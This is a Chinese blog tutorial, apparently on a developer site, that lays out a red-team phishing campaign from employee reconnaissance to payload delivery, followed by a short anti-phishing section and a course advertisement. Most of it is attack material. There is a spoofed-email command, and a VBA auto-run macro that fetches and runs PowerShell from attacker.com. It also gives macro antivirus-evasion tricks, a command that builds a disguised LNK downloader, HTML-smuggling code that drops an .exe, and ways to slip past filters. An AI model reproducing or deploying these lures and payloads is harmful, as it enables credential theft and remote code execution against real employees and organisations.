钓鱼攻击是红队实战的"第一滴血",90%以上的企业入侵都是从一封钓鱼邮件开始的。
全文按真实红队演练流程拆解钓鱼攻击全链路,从情报收集、钓鱼制作到投递与反制,每个环节都有工具和实操技巧,红蓝两队一看就懂!

一、钓鱼攻击概述
钓鱼攻击是一种利用社会工程学手段,诱使受害者执行危险操作(点击链接、下载附件、输入凭据)的攻击方式。它成本低、成功率高,是红队首选的初始突破手段。
钓鱼攻击分类
| 钓鱼类型 | 攻击目标 | 特点 | 成功率 |
|---|---|---|---|
| 邮件钓鱼 | 任意员工 | 批量发送,广撒网 | 中 |
| 鱼叉式钓鱼 | 特定人员 | 精准定制,针对性强 | 高 |
| 鲸钓 | 高管/CEO | 高价值目标,精心策划 | 极高 |
| 水坑攻击 | 特定群体 | 攻陷常访网站间接感染 | 高 |
| 短信钓鱼 | 手机用户 | 短信链接诱导 | 中 |
| 语音钓鱼 | 电话用户 | 冒充客服/IT人员 | 中 |
钓鱼攻击全流程
情报收集 → 伪装制作 → 投递发送 → 诱导点击 → 载荷执行 → 凭据获取 → 内网突破
提示: 钓鱼攻击的成功率不取决于技术有多炫,而在于社会工程学的运用有多自然。越贴近真实场景,成功率越高。
二、情报收集阶段
1. 员工信息收集
# theHarvester 收集邮箱
theHarvester -d company.com -l 500 -b all
# LinkedIn 信息收集
# 使用 LinkedIn 搜索目标公司员工
# 工具:CrossLinked、LinkedInt
# GitHub员工邮箱搜索
python3 gitdorker.py -tf github-dorks.txt -q "@company.com"
# 从公开文档中提取邮件
# Google Hacking
site:company.com filetype:pdf email
site:company.com inurl:contact
2. 目标组织画像
| 信息维度 | 获取方式 | 用途 |
|---|---|---|
| 组织架构 | 官网、LinkedIn | 识别高管、IT部门 |
| 邮件格式 | OSINT工具 | 构造员工邮箱 |
| 常用术语 | 公众号、新闻 | 邮件内容伪装 |
| 业务系统 | 子域名收集 | 伪造登录页面 |
| 合作厂商 | 公开信息 | 冒充供应商钓鱼 |
| 近期热点 | 新闻资讯 | 钓鱼主题策划 |
3. 邮件格式推断
# 使用 h8mail 验证邮箱格式
python3 h8mail.py -t "j.smith@company.com"
# 常见邮箱格式
first.last@company.com # john.smith@
flast@company.com # jsmith@
firstlast@company.com # johnsmith@
first@company.com # john@
lastf@company.com # smithj@
三、钓鱼邮件制作
1. 常见钓鱼主题
| 钓鱼主题 | 适用场景 | 点击率 | 注意事项 |
|---|---|---|---|
| 薪资/奖金通知 | 财务部门 | 高 | 模仿HR口吻 |
| 账户安全警告 | 全体员工 | 高 | 伪造IT部门 |
| 会议邀请/日程 | 管理层 | 中 | 附带恶意附件 |
| 发票/对账通知 | 财务、采购 | 高 | 伪造供应商 |
| 疫情/政策通知 | 全体员工 | 中 | 时效性强 |
| 简历投递 | HR部门 | 中 | 附件含宏病毒 |
| 快递/包裹通知 | 行政部门 | 中 | 链接诱导 |
| 培训通知 | 全体员工 | 中 | 仿造内网系统 |
2. 邮件伪造技术
# 使用 swaks 发送伪造邮件
swaks --to victim@company.com \
--from "hr@company.com" \
--header "Subject: 【重要】本月薪资调整通知" \
--body "请查收附件中的薪资调整说明..." \
--attach @salary.pdf \
--server smtp.attacker.com
# 使用 SET 工具集进行钓鱼
setoolkit
# 1) Social-Engineering Attacks
# 2) Website Attack Vectors
# 3) Credential Harvester Attack Method
# 2) Site Cloner
3. 钓鱼页面克隆
# 使用 SocialFish 克隆登录页
python3 socialfish.py
# 选择克隆目标:Office 365 / Gmail / 企业VPN / 内网OA
# 自定义钓鱼页面
# 关键技巧:
# 1. 抓取真实登录页的HTML/CSS/JS
# 2. 修改表单提交地址到攻击服务器
# 3. 验证错误提示与真实页面一致
# 4. 窃取凭据后跳转到真实登录页
注意: 钓鱼邮件的"信任度"决定成功率。使用真实存在的发件人、匹配公司视觉风格、内容细节真实,才能提高点击转化率。
四、钓鱼载荷制作
1. Office宏病毒
' 基础宏病毒 - AutoOpen 自动执行
Sub AutoOpen()
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
shell.Run "powershell -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"""
End Sub
# 宏免杀技巧
# 1. 字符串拆分 + 拼接
Dim a As String, b As String, c As String
a = "WScr"
b = "ipt.Sh"
c = "ell"
Set shell = CreateObject(a & b & c)
# 2. 延迟执行
Application.Wait (Now + TimeValue("00:00:05"))
# 3. 环境变量拼接
shell.Run Environ("SystemRoot") & "\System32\calc.exe"
2. 恶意快捷方式(LNK)
# 使用 LNKUp 生成恶意快捷方式
python3 lnkup.py generate -i powershell.exe -a "-windowstyle hidden -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" -o "工资明细.lnk"
# 伪装技巧:图标设为PDF/Excel图标,扩展名隐藏
3. HTML Smuggling
<!-- HTML Smuggling - 绕过网关检测 -->
<html>
<body>
<script>
// 将恶意二进制文件Base64编码嵌入HTML
// 通过JavaScript动态构建Blob并触发下载
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for (var i = 0; i < len; i++) {
bytes[i] = binary_string.charCodeAt(i);
}
return bytes.buffer;
}
var file = base64ToArrayBuffer("BASE64_ENCODED_EXE");
var blob = new Blob([file], { type: 'octet/stream' });
var url = window.URL.createObjectURL(blob);
var a = document.createElement('a');
a.href = url;
a.download = "document.pdf.exe";
a.click();
</script>
</body>
</html>
载荷类型对比
| 载荷类型 | 文件格式 | 杀软检出率 | 适用场景 |
|---|---|---|---|
| 宏病毒 | .doc/.xls | 中 | Office环境钓鱼 |
| LNK快捷方式 | .lnk | 低 | 伪装成文档 |
| HTML Smuggling | .html/.htm | 极低 | 邮件/网页钓鱼 |
| ISO镜像 | .iso | 低 | 绕过宏限制 |
| CHM帮助文档 | .chm | 低 | 技术文档伪装 |
| OneNote文件 | .one | 极低 | 新型钓鱼载体 |
警告: 本节内容仅用于授权红队演练和安全研究。制作和传播恶意软件属于违法行为。
五、钓鱼平台与工具
1. Gophish 钓鱼框架
# Gophish - 企业级钓鱼测试平台
# 安装启动
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
./gophish
# 核心功能
# 1. 邮件模板管理 - 可视化编辑邮件内容
# 2. 目标分组管理 - 按部门/角色分组
# 3. 钓鱼页面克隆 - 一键克隆登录页
# 4. 数据统计面板 - 打开率/点击率/提交率
# 5. 报告导出 - PDF/CSV格式
2. 钓鱼检测绕过技巧
| 检测点 | 绕过方法 | 说明 |
|---|---|---|
| SPF/DKIM | 注册相似域名 | typosquatting域名 |
| 附件检测 | 密码加密压缩包 | 邮件中告知解压密码 |
| URL检测 | URL短链接+重定向 | 多级跳转绕过检测 |
| 沙箱检测 | 延迟执行+环境检测 | 沙箱中不触发恶意行为 |
| 宏检测 | XLM宏(Excel 4.0宏) | 传统检测不覆盖 |
| 内容检测 | 图片代替文字 | 钓鱼内容放图片中 |
六、水坑攻击与高级钓鱼
1. 水坑攻击原理
水坑攻击(Watering Hole)是攻击者攻陷目标群体常访问的网站,植入恶意代码,等待目标访问时中招。
目标群体分析 → 识别常访网站 → 攻陷网站植入后门 → 等待目标访问 → 漏洞利用 → 获取权限
2. 水坑攻击实现方式
| 攻击方式 | 原理 | 适用场景 |
|---|---|---|
| 浏览器漏洞利用 | 利用0day/Nday漏洞 | 有漏洞利用工具时 |
| 恶意插件下载 | 在下载站植入后门 | 软件下载类网站 |
| 凭据窃取 | 篡改登录表单 | 有用户登录的网站 |
| 供应链攻击 | 篡改更新包 | 软件厂商网站 |
3. 浏览器指纹识别
// 识别目标用户是否在目标企业网络
// 通过 IP 段、内部域名解析、特殊插件等特征
function isTargetCompany() {
const ip = getClientIP();
const plugins = navigator.plugins;
const screen = screen.width + "x" + screen.height;
const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
// 综合判断是否为目标人员
return matchTargetProfile(ip, plugins, timezone);
}
七、蓝队防御与反钓鱼
1. 技术防护
| 防护层级 | 技术手段 | 说明 |
|---|---|---|
| 邮件网关 | SPF/DKIM/DMARC | 验证邮件来源合法性 |
| 附件沙箱 | 动态分析 | 检测恶意附件 |
| URL过滤 | 威胁情报匹配 | 拦截恶意链接 |
| 端点防护 | EDR/杀软 | 检测恶意载荷执行 |
| Web防护 | 浏览器隔离 | 远程浏览器隔离风险 |
| MFA | 多因素认证 | 即使凭据泄露也无法登录 |
2. 意识培训
# 钓鱼演练最佳实践
# 1. 定期开展模拟钓鱼测试
# 2. 对点击用户进行安全再培训
# 3. 建立钓鱼举报渠道
# 4. 季度复盘,统计点击率趋势
# 员工识别钓鱼的5个要点
# 1. 检查发件人邮箱(不是显示名)
# 2. 鼠标悬停链接,查看真实URL
# 3. 警惕"紧急""立即行动"等施压措辞
# 4. 不下载不明附件,不点击可疑链接
# 5. 有疑问直接电话联系发件人确认
3. 检测与响应
# 钓鱼事件检测信号
# 1. 邮件网关告警:可疑附件/链接
# 2. 异常登录:异地/异常时间登录
# 3. EDR告警:可疑进程/横向移动
# 4. 用户举报:员工主动报告钓鱼邮件
# 应急响应步骤
# 1. 隔离受影响账户,重置密码
# 2. 排查受影响主机,清除恶意软件
# 3. 追溯攻击路径,评估数据泄露
# 4. 全网告警,加固同类攻击入口
提示: 钓鱼防御的本质是"人防+技防"双管齐下。技术再先进,人的意识不到位,钓鱼总能成功。
警告: 钓鱼攻击技术仅用于授权的安全测试和意识培训。未经授权的钓鱼攻击属于违法行为,可能触犯《网络安全法》和《刑法》。
学习资源
2026年最新版本,全网最全的网安视频教程。耗时半年打造,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的红队钓鱼、社会工程学等高阶技术。

总共200多节视频,200多G的资源,不用担心学不全。(包含邮件钓鱼、水坑攻击、宏病毒制作、钓鱼平台搭建等技术点)
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析钓鱼攻击的底层原理与高级绕过策略,并对业内挑战巨大的水坑攻击、宏免杀技术等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从情报收集、钓鱼制作、载荷投递、利用执行到检测响应、意识培训的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、部分核心内容展示
独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群
一、基础适配人群
零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到社会工程学的完整知识链;
开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与钓鱼检测技能,实现职业方向拓展或者转行就业;
应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握红队钓鱼、社会工程学等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升钓鱼检测、意识培训等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传,戳下面拿:
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:

————————————————

72

被折叠的 条评论
为什么被折叠?



